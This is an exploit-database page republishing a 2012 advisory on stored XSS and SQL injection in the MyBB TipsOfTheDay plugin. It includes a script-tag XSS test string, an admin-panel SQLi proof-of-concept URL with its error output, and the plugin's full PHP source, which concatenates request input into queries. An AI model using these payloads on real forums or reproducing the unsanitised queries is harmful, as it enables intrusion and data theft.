0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MyBB TipsOfTheDay Plugin Multiple Vulnerabilities
[# Exploit Title: TipsOfTheDay mybb plugin stored XSS and SQL injection vulnerabilitys.
# Date: 12.12.2012
# Exploit Author: VipVince
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://mods.mybb.com/view/tips-of-the-day
# Version: 1.0
# Tested on: Windows
The tipsoftheday.php file is vulnerable to two common web vulnerability's. I will demonstrate below:
**********************************Stored XSS.**********************************************
The vulnerability lies here.
<?php
$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']);
?>
And can be exploited here.
http://www.server.com/dir/misc.php?tips=newtip
Add <script>alert(/xss/)</script> into the boxes as newtip and then refresh the page. Bingo our stored XSS pop up.
**************************************** SQLi Vuln ***************************************************
<?php
$query = $db->simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);
?>
As you can see has not been sanitized.
It can be exploited via admin panel. POC below:
http://www.server.com/bladir/admin/index.php?module=config-tipsoftheday&action=edittip&tip=[VAILD_ID]'[SQLi]
Result.
[quote]
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Query:
SELECT * FROM mybb_tipsoftheday WHERE totdid=1'
[/quote]
Brought to you by VipVince. Enjoy the 12/12/2012 "it only comes once" and all that bullshit.
<?php
if(!defined("IN_MYBB"))
{
die("Direct initialization of this file is not allowed.<br /><br />Please make sure IN_MYBB is defined.");
}
$plugins->add_hook("admin_config_menu", "tipsoftheday_admin_nav");
$plugins->add_hook("admin_config_action_handler", "tipsoftheday_action_handler");
$plugins->add_hook("admin_load", "tipsoftheday_admin");
$plugins->add_hook("index_start", "tipsoftheday_index");
$plugins->add_hook("misc_start", "tipsusers");
function tipsoftheday_info()
{
global $lang;
$lang->load("config_tipsoftheday", false, true);
return array(
"name" => $lang->name,
"description" => $lang->descriptionplugin,
"website" => "http://mybb-es.com",
"author" => "Edson Ordaz",
"authorsite" => "http://mybb-es.com",
"version" => "1.0",
"guid" => "f52d89922b319c5256b23cd1b3f09eb1",
"compatibility" => "*"
);
}
function tipsoftheday_activate()
{
global $db,$lang,$message;
$message .= $lang->activatemessage;
$lang->load("config_tipsoftheday", false, true);
if(!$db->table_exists("tipsoftheday") && !$db->table_exists("tipsoftheday_users"))
{
$db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday` (
`totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`uid` int(10) NOT NULL,
`tiptle` text NOT NULL DEFAULT '',
`tip` text NOT NULL DEFAULT '',
PRIMARY KEY (`totdid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
$db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday_users` (
`totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`uid` int(10) NOT NULL,
`tiptle` text NOT NULL DEFAULT '',
`tip` text NOT NULL DEFAULT '',
PRIMARY KEY (`totdid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
}
$tipsoftheday = array(
"tid" => "NULL",
"title" => 'tipsoftheday',
"template" => $db->escape_string('<style>
.tipoftheday{
display: block;
top:10px;
left:10px;
width:90%;
border:3px solid #FFD324;
background:#FFF6BF top left no-repeat;
padding:8px 8px 8px;
font-size:11px;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
border-radius: 10px;
-moz-box-shadow: 0px 0px 10px #777777;
-webkit-box-shadow: 0px 0px 10px #777777;
box-shadow: 0px 0px 10px #777777;
}
</style>
<span class="tipoftheday">
<strong>{$tip[\'tiptle\']}</strong><br />
{$tip[\'tip\']}
</span>
<br />'),
"sid" => "-1",
);
$tipsoftheday_newtip = array(
"tid" => "NULL",
"title" => 'tipsoftheday_newtip',
"template" => $db->escape_string('<html>
<head>
<title>{$lang->newtiptab}</title>
{$headerinclude}
</head>
<body>
{$header}
<form action="misc.php?tips=do_newtip" method="post" enctype="multipart/form-data" name="input">
<input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
<table border="0" cellspacing="{$theme[\'borderwidth\']}" cellpadding="{$theme[\'tablespace\']}" class="tborder">
<tr>
<td class="thead" colspan="2"><strong>{$lang->newtiptab}</strong></td>
</tr>
<tr>
<td class="trow2" width="15%"><strong>{$lang->newtipsubject}</strong></td>
<td class="trow2"><input type="text" class="textbox" name="tiptle" size="60" maxlength="85" value="{$tiptle}" tabindex="1" /></td>
</tr>
<tr>
<td class="trow2" valign="top"><strong>{$lang->newtipbody}</strong></td>
<td class="trow2">
<textarea name="tip" rows="5" cols="70" tabindex="2">{$tip}</textarea>
</td>
</tr>
</table>
<br /><div style="text-align:center">
<input type="submit" class="button" name="submit" value="{$lang->sendtipadmins}" tabindex="4" accesskey="s" />
<br /></div>
</form>
{$footer}
</body>
</html>'),
"sid" => "-1",
);
$db->insert_query("templates", $tipsoftheday);
$db->insert_query("templates", $tipsoftheday_newtip);
require_once MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets('index', '#{\$header}#', '{\$header}{$tips}');
$updatetips = array(
'uid' => 1,
'tiptle' => $db->escape_string($lang->templatitle),
'tip' => $db->escape_string($lang->templatbody)
);
$db->insert_query("tipsoftheday", $updatetips);
}
function tipsoftheday_deactivate()
{
global $db;
$db->drop_table("tipsoftheday");
$db->drop_table("tipsoftheday_users");
$db->delete_query("templates","title = 'tipsoftheday'");
$db->delete_query("templates","title = 'tipsoftheday_newtip'");
require MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets("index", '#{\$tips}#ism', "");
}
class Tips_Send_User {
/*
* Static tips
*
*/
private static $tips;
/*
* Class tips
*
*/
public static function Tips()
{
if(!is_object($tips))
{
$tips = new self;
}
return $tips;
}
/*
* Verificar titulo
* Tip enviado por miembro del foro
*
*/
public function verify_title($title)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($title)) > 5)
{
return true;
}
else
{
error($lang->tiptleminchars,$lang->name);
}
}
/*
*Verificar cuerpo del tip
* Enviado por usuario del foro
* Esperando aprobacion
*
*/
public function verify_tip($tip)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($tip)) > 15)
{
return true;
}
else
{
error($lang->tipbodyminchars,$lang->name);
}
}
/*
* Subir tip a tabla de tips
* Esperando aprobacion
*
* Si se aprueba se muestra
*
*/
public function update_new_tip($title,$tip,$uid)
{
global $db,$lang;
$updatetips = array(
'uid' => $uid,
'tiptle' => $db->escape_string($title),
'tip' => $db->escape_string($tip)
);
$totdid = $db->insert_query("tipsoftheday_users", $updatetips);
redirect("index.php",$lang->sendpet);
}
/*
* Tips
* Pagina de usuarios
* Pagina para el foro donde
* Los usuarios envian tips al staff
* Desde ACP son moderados
* Para ser mostrados o no
*
*/
public function Tips_Users()
{
global $db,$mybb,$templates,$theme;
global $header,$headerinclude,$footer,$lang;
$lang->load("admin/config_tipsoftheday", false, true);
if($mybb->input['tips'] != "newtip" && $mybb->input['tips'] != "do_newtip")
{
return;
}
if($mybb->input['tips'] == "do_newtip" && $mybb->request_method == "post")
{
verify_post_check($mybb->input['my_post_key']);
$this->verify_title($mybb->input['tiptle']);
$this->verify_tip($mybb->input['tip']);
$this->update_new_tip($mybb->input['tiptle'],$mybb->input['tip'],$mybb->user['uid']);
}
if($mybb->user['uid'] == 0)
{
error_no_permission();
}
add_breadcrumb($lang->addcreateheader);
eval("\$newtip = \"".$templates->get("tipsoftheday_newtip")."\";");
output_page($newtip);
}
}
class tipsadmin
{
/*
* Admin Tip
* TipsAdmin
*
*/
private static $admintip;
/*
* Returns class
*
*/
public static function TipsAdmin()
{
if(!is_object($admintip))
{
$admintip = new self;
}
return $admintip;
}
/*
* Construct class
*
*/
public function __construct()
{
$this->tipsoftheday = new tipsoftheday();
}
/*
* Nav admin
*
*/
public function AdminNav(&$nav)
{
global $mybb,$lang;
$lang->load("config_tipsoftheday", false, true);
end($nav);
$key = (key($nav))+10;
if(!$key)
{
$key = '110';
}
$nav[$key] = array('id' => "tipsoftheday", 'title' => $lang->name, 'link' => "index.php?module=config-tipsoftheday");
}
/*
* Admin Load
*
*/
public function AdminTips()
{
global $mybb, $db, $page, $cache, $lang;
if($page->active_action != "tipsoftheday")
{
return;
}
$page->add_breadcrumb_item($lang->name);
$page->output_header($lang->name);
$this->action_save($mybb->input['tiptle'],$mybb->input['tip'],$mybb->user['uid']);
$this->newtip();
$this->deletetip();
$this->edittip();
$this->requests();
$this->approve();
$this->reject();
$this->edittemplate();
$this->templatenewtip();
$this->savetemplate();
$this->savetemplatenews();
$this->saveedit();
$this->tabs("tips");
$this->tabletips($mybb->post_code);
$page->output_footer();
}
/*
* Guarda el tip del dia
* Envia funcion
*
*/
public function action_save($tiptle,$tip,$uid)
{
global $mybb;
if($mybb->input['action'] == "save")
{
$this->tipsoftheday->Save_Tip($tiptle,$tip,$uid);
}
}
/*
* Pestañas de Configuracion
*
*/
public function tabs($location)
{
global $page,$lang,$mybb;
$lang->requeststabdes = $lang->sprintf($lang->requeststabdes, $mybb->settings['bburl']."/misc.php?tips=newtip");
$tabs["tips"] = array(
'title' => $lang->name,
'link' => "index.php?module=config-tipsoftheday",
'description' => $lang->tipsdestabs
);
$tabs["newtip"] = array(
'title' => $lang->newtiptab,
'link' => "index.php?module=config-tipsoftheday&action=newtip",
'description' => $lang->newtiptabdes
);
$tabs["requests"] = array(
'title' => $lang->requeststab,
'link' => "index.php?module=config-tipsoftheday&action=requests",
'description' => $lang->requeststabdes
);
if($location == "template" || $location == "usertips")
{
$lang->templatetab = $lang->nametabindex;
}
$tabs["template"] = array(
'title' => $lang->templatetab,
'link' => "index.php?module=config-tipsoftheday&action=template",
'description' => $lang->templatetabdes
);
if($location == "template" || $location == "usertips")
{
$tabs["usertips"] = array(
'title' => $lang->usertipstab,
'link' => "index.php?module=config-tipsoftheday&action=templatenewtip",
'description' => $lang->usertipstabdes
);
}
$page->output_nav_tabs($tabs,$location);
}
/*
* Guardar plantilla
* Envia informacion
* al siguiente class
*
*/
public function savetemplate()
{
global $mybb,$db,$lang;
if($mybb->input['action'] == "savetemplate")
{
if($mybb->input['continue'])
{
$this->tipsoftheday->savetemplate($mybb->input['template'],$mybb->user['uid']);
}
if($mybb->input['revert'])
{
$template = array(
"template" => '<style>
.tipoftheday{
display: block;
top:10px;
left:10px;
width:90%;
border:3px solid #FFD324;
background:#FFF6BF top left no-repeat;
padding:8px 8px 8px;
font-size:11px;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
border-radius: 10px;
-moz-box-shadow: 0px 0px 10px #777777;
-webkit-box-shadow: 0px 0px 10px #777777;
box-shadow: 0px 0px 10px #777777;
}
</style>
<span class="tipoftheday">
<strong>{$tip[\\\'tiptle\\\']}</strong><br />
{$tip[\\\'tip\\\']}
</span>
<br />',
);
$db->update_query("templates", $template,"title='tipsoftheday'");
$this->tipsoftheday->fmessage($lang->templatesave,"success","&action=template");
}
}
}
/*
* Guardar plantilla
* Peticiones
*
*/
public function savetemplatenews()
{
global $mybb,$db,$lang;
if($mybb->input['action'] == "savetemplatenews")
{
if($mybb->input['continue'])
{
$this->tipsoftheday->savetemplatenews($mybb->input['template'],$mybb->user['uid']);
}
if($mybb->input['revert'])
{
$template = array(
"template" => '<html>
<head>
<title>{$lang->newtiptab}</title>
{$headerinclude}
</head>
<body>
{$header}
<form action="misc.php?tips=do_newtip" method="post" enctype="multipart/form-data" name="input">
<input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
<table border="0" cellspacing="{$theme[\\\'borderwidth\\\']}" cellpadding="{$theme[\\\'tablespace\\\']}" class="tborder">
<tr>
<td class="thead" colspan="2"><strong>{$lang->newtiptab}</strong></td>
</tr>
<tr>
<td class="trow2" width="15%"><strong>{$lang->newtipsubject}</strong></td>
<td class="trow2"><input type="text" class="textbox" name="tiptle" size="60" maxlength="85" value="{$tiptle}" tabindex="1" /></td>
</tr>
<tr>
<td class="trow2" valign="top"><strong>{$lang->newtipbody}</strong></td>
<td class="trow2">
<textarea name="tip" rows="5" cols="70" tabindex="2">{$tip}</textarea>
</td>
</tr>
</table>
<br /><div style="text-align:center">
<input type="submit" class="button" name="submit" value="{$lang->sendtipadmins}" tabindex="4" accesskey="s" />
<br /></div>
</form>
{$footer}
</body>
</html>',
);
$db->update_query("templates", $template,"title='tipsoftheday_newtip'");
$this->tipsoftheday->fmessage($lang->templatesave,"success","&action=templatenewtip");
}
}
}
/*
* Tabla de Tips
*
*/
function tabletips($mpcode)
{
global $db,$lang,$mybb;
$query = $db->simple_select('tipsoftheday', 'COUNT(totdid) AS tips', '', array('limit' => 1));
$quantity = $db->fetch_field($query, "tips");
$pagina = intval($mybb->input['page']);
$perpage = 15;
if($pagina > 0)
{
$start = ($pagina - 1) * $perpage;
$pages = $quantity / $perpage;
$pages = ceil($pages);
if($pagina > $pages || $pagina <= 0)
{
$start = 0;
$pagina = 1;
}
}
else
{
$start = 0;
$pagina = 1;
}
$pageurl = "index.php?module=config-tipsoftheday";
$table = new Table;
$table->construct_header($lang->user, array("width" => "10%"));
$table->construct_header($lang->title, array("width" => "10%"));
$table->construct_header($lang->tip, array("width" => "70%"));
$table->construct_header($lang->edit, array("width" => "5%"));
$table->construct_header($lang->delete, array("width" => "5%"));
$table->construct_row();
$query = $db->query('SELECT * FROM '.TABLE_PREFIX.'tipsoftheday ORDER BY totdid DESC LIMIT '.$start.', '.$perpage);
while($tip = $db->fetch_array($query))
{
$lang->deletetippopup = $lang->sprintf($lang->deletetippopup, $tip['tiptle']);
$table->construct_cell($this->tipsoftheday->username($tip[uid]));;
$table->construct_cell($tip[tiptle]);
$table->construct_cell($tip[tip]);
$table->construct_cell("<a href=\"index.php?module=config-tipsoftheday&action=edittip&tip={$tip['totdid']}\" ><img src=\"styles/default/images/icons/custom.gif\" /></a>",array("class" => "align_center"));
$table->construct_cell("<a href=\"index.php?module=config-tipsoftheday&action=deletetip&tip={$tip['totdid']}&my_post_key={$mpcode}\" onclick=\"return AdminCP.deleteConfirmation(this, '{$lang->deletetippopup}')\"><img src=\"styles/default/images/icons/delete.gif\" /> </a>",array("class" => "align_center"));
$table->construct_row();
}
$table->output($lang->name);
echo multipage($quantity, (int)$perpage, (int)$pagina, $pageurl);
}
/*
* Tabla de peticiones
*
*/
public function requests()
{
global $db,$lang,$page,$mybb;
if($mybb->input['action'] == "requests")
{
$this->tabs("requests");
$query = $db->simple_select('tipsoftheday_users', 'COUNT(totdid) AS tips', '', array('limit' => 1));
$quantity = $db->fetch_field($query, "tips");
$pagina = intval($mybb->input['page']);
$perpage = 15;
if($pagina > 0)
{
$start = ($pagina - 1) * $perpage;
$pages = $quantity / $perpage;
$pages = ceil($pages);
if($pagina > $pages || $pagina <= 0)
{
$start = 0;
$pagina = 1;
}
}
else
{
$start = 0;
$pagina = 1;
}
$pageurl = "index.php?module=config-tipsoftheday&action=requests";
$table = new Table;
$table->construct_header($lang->user, array("width" => "10%"));
$table->construct_header($lang->title, array("width" => "10%"));
$table->construct_header($lang->tip, array("width" => "70%"));
$table->construct_header($lang->options, array("width" => "10%"));
$table->construct_row();
$query = $db->query('SELECT * FROM '.TABLE_PREFIX.'tipsoftheday_users ORDER BY totdid DESC LIMIT '.$start.', '.$perpage);
while($tip = $db->fetch_array($query))
{
$lang->deletetippopup = $lang->sprintf($lang->deletetippopup, $tip['tiptle']);
$table->construct_cell($this->tipsoftheday->username($tip[uid]));;
$table->construct_cell($tip[tiptle]);
$table->construct_cell($tip[tip]);
$popup = new PopupMenu("tip_{$tip['totdid']}", $lang->options);
$popup->add_item($lang->aprobe, "index.php?module=config-tipsoftheday&approve={$tip['totdid']}");
$popup->add_item($lang->reject, "index.php?module=config-tipsoftheday&reject={$tip['totdid']}");
$Popuss = $popup->fetch();
$table->construct_cell($Popuss, array('class' => 'align_center'));
$table->construct_row();
}
$table->output($lang->name);
echo multipage($quantity, (int)$perpage, (int)$pagina, $pageurl);
$page->output_footer();
}
}
/*
* Aprobar
* Peticion
*
*/
public function approve()
{
global $mybb,$db,$lang;
if($mybb->input['approve'])
{
$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']);
$tip = $db->fetch_array($query);
$title = $tip[tiptle];
$tipbody = $tip[tip];
$user = $tip[uid];
$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday_users WHERE totdid='".intval($mybb->input['approve'])."'");
$this->tipsoftheday->Save_Tip($title,$tipbody,$user);
}
}
/*
* Rechazar el tip
*
*/
public function reject()
{
global $mybb,$lang,$db;
if($mybb->input['reject'])
{
$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['reject']);
$tip = $db->fetch_array($query);
if(!$tip['totdid'])
{
$this->tipsoftheday->fmessage($lang->tipnotexists,"error","");
}
$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday_users WHERE totdid='".intval($mybb->input['reject'])."'");
$this->tipsoftheday->fmessage($lang->deletetipsuccess,"success","&action=requests");
}
}
/*
* Nuevo Tip
* Formulario
*
*/
public function newtip()
{
global $mybb,$page,$lang;
if($mybb->input['action'] == "newtip")
{
$this->tabs("newtip");
$form = new Form("index.php?module=config-tipsoftheday&action=save", "post");
$form_container = new FormContainer($lang->newtiptab);
$form_container->output_row($lang->newtipsubject, $lang->newtipsubjectdes, $form->generate_text_box('tiptle', "", array('id' => 'tiptle')), 'tiptle');
$form_container->output_row($lang->newtipbody, $lang->newtipbodydes, $form->generate_text_area('tip', "", array('id' => 'tip')), 'tip');
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->savetip);
$form->output_submit_wrapper($buttons);
$form->end();
$page->output_footer();
}
}
/*
* Eliminacion de Tip
* Recibe totdid
*
*/
public function deletetip()
{
global $db,$mybb,$page,$lang;
if($mybb->input['action'] == "deletetip")
{
$query = $db->simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);
if(!$tip['totdid'])
{
$this->tipsoftheday->fmessage($lang->tipnotexists,"error","");
}
if($mybb->input['no'])
{
admin_redirect("index.php?module=config-tipsoftheday");
}
if($mybb->request_method == "post")
{
$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday WHERE totdid='".intval($mybb->input['tip'])."'");
$this->tipsoftheday->fmessage($lang->deletetipsuccess,"success","");
}
else
{
$page->output_confirm_action("index.php?module=config-tipsoftheday");
}
}
}
/*
* Editar Tip
*
*/
public function edittip()
{
global $mybb,$db,$page,$lang;
if($mybb->input['action'] == "edittip")
{
$this->tipsoftheday->verify_totdid($mybb->input['tip']);
$this->tabs("tips");
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."tipsoftheday WHERE totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);
$form = new Form("index.php?module=config-tipsoftheday&action=saveedit", "post");
echo $form->generate_hidden_field("totdid", $tip[totdid]);
echo $form->generate_hidden_field("autor", $tip[uid]);
$form_container = new FormContainer($tip[tiptle]);
$form_container->output_row($lang->newtipsubject, $lang->newtipsubjectdes, $form->generate_text_box('tiptle',$tip[tiptle], array('id' => 'tiptle')), 'tiptle');
$form_container->output_row($lang->newtipbody, $lang->newtipbodydes, $form->generate_text_area('tip',$tip[tip], array('id' => 'tip')), 'tip');
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->saveedittip);
$form->output_submit_wrapper($buttons);
$form->end();
$page->output_footer();
}
}
/*
* Guardar edicion
*
*/
public function saveedit()
{
global $mybb;
if($mybb->input['action'] == "saveedit")
{
$this->tipsoftheday->Save_Edit_Tip($mybb->input['totdid'],$mybb->input['tiptle'],$mybb->input['tip'],$mybb->input['autor']);
}
}
/*
* Editar Plantilla
*
*/
public function edittemplate()
{
global $mybb,$db,$page,$lang;
if($mybb->input['action'] == "template")
{
$this->tabs("template");
$queryadmin=$db->simple_select('adminoptions','*','uid='.$mybb->user['uid']);
$admin_options=$db->fetch_array($queryadmin);
if($admin_options['codepress']!=0)
{
$page->extra_header='<link type="text/css" href="./jscripts/codepress/languages/codepress-mybb.css" rel="stylesheet" id="cp-lang-style" />
<script type="text/javascript" src="./jscripts/codepress/codepress.js"></script>
<script type="text/javascript">
CodePress.language=\'mybb\';
</script>';
}
$query = $db->write_query("SELECT template FROM ".TABLE_PREFIX."templates WHERE title='tipsoftheday'");
$template = $db->fetch_array($query);
$form = new Form("index.php?module=config-tipsoftheday&action=savetemplate", "post");
$form_container = new FormContainer("Editar Plantilla: ".$lang->name);
$form_container->output_row($lang->edittemplatename."<em>*</em>",$lang->edittemplatenamedes, "<input type=\"text\" class=\"text_input\" value=\"tipsoftheday\" readonly=\"readonly\">");
$form_container->output_row($lang->edittemplateset."<em>*</em>",$lang->edittemplatesetdes, "<select><option>{$lang->name}</option></select>");
$form_container->output_row("","", $form->generate_text_area('template',$template['template'],array('id'=>'template','class'=>'codepress mybb','style'=>'width:100%;height:500px;')));
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->savetemplate, array('name' => 'continue'));
$buttons[] = $form->generate_submit_button($lang->backoriginal, array('name' => 'revert', 'onclick' => 'return confirm(\''.$lang->revertoriginalquestion.'\');'));
$form->output_submit_wrapper($buttons);
$form->end();
if($admin_options['codepress']!=0)
{
echo '<script type="text/javascript">
Event.observe(\'add_template\',\'submit\',function()
{
if($(\'template_cp\'))
{
var area=$(\'template_cp\');
area.id=\'template\';
area.value=template.getCode();
area.disabled=false;
}
});
</script>';
}
$page->output_footer();
}
}
/*
* Editar plantilla
* peticiones de tips
*
*/
public function templatenewtip()
{
global $mybb,$db,$page,$lang;
if($mybb->input['action'] == "templatenewtip")
{
$this->tabs("usertips");
$queryadmin=$db->simple_select('adminoptions','*','uid='.$mybb->user['uid']);
$admin_options=$db->fetch_array($queryadmin);
if($admin_options['codepress']!=0)
{
$page->extra_header='<link type="text/css" href="./jscripts/codepress/languages/codepress-mybb.css" rel="stylesheet" id="cp-lang-style" />
<script type="text/javascript" src="./jscripts/codepress/codepress.js"></script>
<script type="text/javascript">
CodePress.language=\'mybb\';
</script>';
}
$query = $db->write_query("SELECT template FROM ".TABLE_PREFIX."templates WHERE title='tipsoftheday_newtip'");
$template = $db->fetch_array($query);
$form = new Form("index.php?module=config-tipsoftheday&action=savetemplatenews", "post");
$form_container = new FormContainer("Editar Plantilla: ".$lang->name);
$form_container->output_row($lang->edittemplatename."<em>*</em>",$lang->edittemplatenamedes, "<input type=\"text\" class=\"text_input\" value=\"tipsoftheday_newtip\" readonly=\"readonly\">");
$form_container->output_row($lang->edittemplateset."<em>*</em>",$lang->edittemplatesetdes, "<select><option>{$lang->name}</option></select>");
$form_container->output_row("","", $form->generate_text_area('template',$template['template'],array('id'=>'template','class'=>'codepress mybb','style'=>'width:100%;height:500px;')));
$form_container->end();
$buttons[] = $form->generate_submit_button($lang->savetemplate, array('name' => 'continue'));
$buttons[] = $form->generate_submit_button($lang->backoriginal, array('name' => 'revert', 'onclick' => 'return confirm(\''.$lang->revertoriginalquestion.'\');'));
$form->output_submit_wrapper($buttons);
$form->end();
if($admin_options['codepress']!=0)
{
echo '<script type="text/javascript">
Event.observe(\'add_template\',\'submit\',function()
{
if($(\'template_cp\'))
{
var area=$(\'template_cp\');
area.id=\'template\';
area.value=template.getCode();
area.disabled=false;
}
});
</script>';
}
$page->output_footer();
}
}
}
class tipsoftheday {
/**
* Tips
*
*/
private static $tips;
/*
* Static class
*
*/
public static function Tips()
{
if(!is_object($tips))
{
$tips = new self;
}
return $tips;
}
/*
* Guarda el tip del dia
*
*/
public function Save_Tip($subject,$body,$user)
{
global $db,$lang;
$this->verify_tiptle($subject);
$this->verify_tip($body);
$updatetips = array(
'uid' => (int)($user),
'tiptle' => $db->escape_string($subject),
'tip' => $db->escape_string($body)
);
$totdid = $db->insert_query("tipsoftheday", $updatetips);
$this->fmessage($lang->savetipsuccess,"success","");
}
/*
* Error de caracteres minimos
* Titulo y Mensaje
*
*/
public function fmessage($langerror,$type,$url)
{
flash_message($langerror, $type);
admin_redirect("index.php?module=config-tipsoftheday".$url);
}
/*
* Verifica el mensaje del tip
* Verificar si existen los caracteres correctos
* Verificar que el mensaje no este vacio
*
*/
public function verify_tip($tip)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($tip)) == 0)
{
$this->fmessage($lang->tipbodyempty,"error","&action=newtip");
}
else if(strlen($tip) < 10)
{
$this->fmessage($lang->tipbodyminchars,"error","&action=newtip");
}
else if(my_strlen($tip) < 10)
{
$this->fmessage($lang->tipbodyminchars,"error","&action=newtip");
}
return true;
}
/*
* Verifica si existe usuario
*
*/
public function verify_user($uid)
{
global $db,$lang;
$query = $db->simple_select("users", "COUNT(*) as user", "uid='".intval($uid)."'", array('limit' => 1));
if($db->fetch_field($query, 'user') == 1)
{
return true;
}
else
{
$this->fmessage($lang->usernotexists,"error","");
}
}
/*
* Verifica que exista el Tip
*
*/
public function verify_totdid($id)
{
global $db,$lang;
$query = $db->simple_select("tipsoftheday", "COUNT(*) as tip", "totdid='".intval($id)."'", array('limit' => 1));
if($db->fetch_field($query, 'tip') == 1)
{
return true;
}
else
{
$this->fmessage($lang->tipnotexistserror,"error","");
}
}
/*
* Verficar que el titulo
* del tip no este vacio
*
* Solo necesita 3 caracteres para poder enviarse
*
*/
public function verify_tiptle($tip)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($tip)) > 3)
{
return true;
}
else
{
$this->fmessage($lang->tiptleminchars,"error","&action=newtip");
}
}
/*
* Verificar la plantilla
* Verificar que no se encuentre vacia
*
*/
public function verify_template($template,$url)
{
global $mybb,$lang;
if(my_strlen(trim_blank_chrs($template)) != 0)
{
return true;
}
else
{
$this->fmessage($lang->templateminchars,"error",$url);
}
}
/*
* Formato de Nombre
* Nombre con Color
* Color del grupo Obtenido
*
*/
public function username($uid)
{
global $db,$cache,$groupscache;
$query_users = $db->simple_select("users", "*", "uid=".$uid);
while($user = $db->fetch_array($query_users))
{
$groupscache = $cache->read("usergroups");
$ugroup = $groupscache[$user['usergroup']];
$format = $ugroup['namestyle'];
$userin = substr_count($format, "{username}");
if($userin == 0)
{
$format = "{username}";
}
$format = stripslashes($format);
$username = str_replace("{username}", $user['username'], $format);
}
return $username;
}
/*
* Guardar Plantilla
*
*/
public function savetemplate($template,$uid)
{
global $mybb,$db,$lang;
$this->verify_user($uid);
$this->verify_template($template);
$template = array(
"template" => $db->escape_string($template)
);
$db->update_query("templates", $template,"title='tipsoftheday'");
$this->fmessage($lang->templatesave,"success","&action=template");
}
/*
* Guarda la plantilla
* Petiiones
*
*/
public function savetemplatenews($template,$uid)
{
global $mybb,$db,$lang;
$this->verify_user($uid);
$this->verify_template($template,"&action=templatenewtip");
$template = array(
"template" => $db->escape_string($template)
);
$db->update_query("templates", $template,"title='tipsoftheday_newtip'");
$this->fmessage($lang->templatesave,"success","&action=templatenewtip");
}
/*
* Guarda edicion de Tip
*
*/
public function Save_Edit_Tip($id,$subject,$body,$uid)
{
global $db,$lang;
$this->verify_tiptle($subject);
$this->verify_tip($body);
$this->verify_user($uid);
$this->verify_totdid($id);
$editupdate = array(
'uid' => (int)($uid),
'tiptle' => $db->escape_string($subject),
'tip' => $db->escape_string($body)
);
$db->update_query("tipsoftheday", $editupdate,"totdid=".$id);
$this->fmessage($lang->editsuccesssave,"success","");
}
/*
* Funcion para mostrar Tip
*
*/
public function Index_tips()
{
global $mybb,$tips,$db,$templates;
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."tipsoftheday ORDER BY RAND() LIMIT 1;");
$tip = $db->fetch_array($query);
eval("\$tips = \"".$templates->get("tipsoftheday")."\";");
}
}
function tipsoftheday_action_handler(&$action)
{
$action['tipsoftheday'] = array('active' => 'tipsoftheday', 'file' => '');
}
function tipsoftheday_admin_nav(&$sub_menu)
{
tipsadmin::TipsAdmin()->AdminNav(&$sub_menu);
}
function tipsoftheday_admin()
{
tipsadmin::TipsAdmin()->AdminTips();
}
function tipsoftheday_index()
{
tipsoftheday::Tips()->Index_tips();
}
function tipsusers()
{
Tips_Send_User::Tips()->Tips_Users();
}
?>
# 0day.today [2024-07-07] #